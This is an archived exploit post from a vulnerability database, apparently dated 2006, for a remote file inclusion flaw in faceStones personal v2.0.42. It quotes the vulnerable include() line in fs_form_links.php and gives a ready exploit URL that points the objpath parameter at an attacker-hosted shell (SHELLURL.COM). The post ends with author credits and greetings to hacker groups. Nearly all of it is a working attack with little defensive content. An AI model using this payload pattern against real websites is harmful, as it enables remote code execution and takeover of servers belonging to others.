Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14422
HistorySep 26, 2006 - 12:00 a.m.

faceStones personal <= v2.0.42 (objpath) Remote File Inclusion Exploit

2006-09-2600:00:00
vulners.com
13

#==============================================================================================
#faceStones personal <= v2.0.42 (objpath) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://www.facestones.de/fshtml/service/download/index.php

#Version : v2.0.42

#================================================================================================
#Bug in : fsl2/objects/fs_form_links.php

#Vlu Code :
#--------------------------------

include($GLOBALS['fsinit']['objpath'] . '/fs_display_indextab.php');

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/fsl2/objects/fs_form_links.php?GLOBALS[fsinit][objpath]=http://SHELLURL.COM

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#Special Thx To : Str0ke & XoRoN & Timq & Simoo & Saudi HAckerz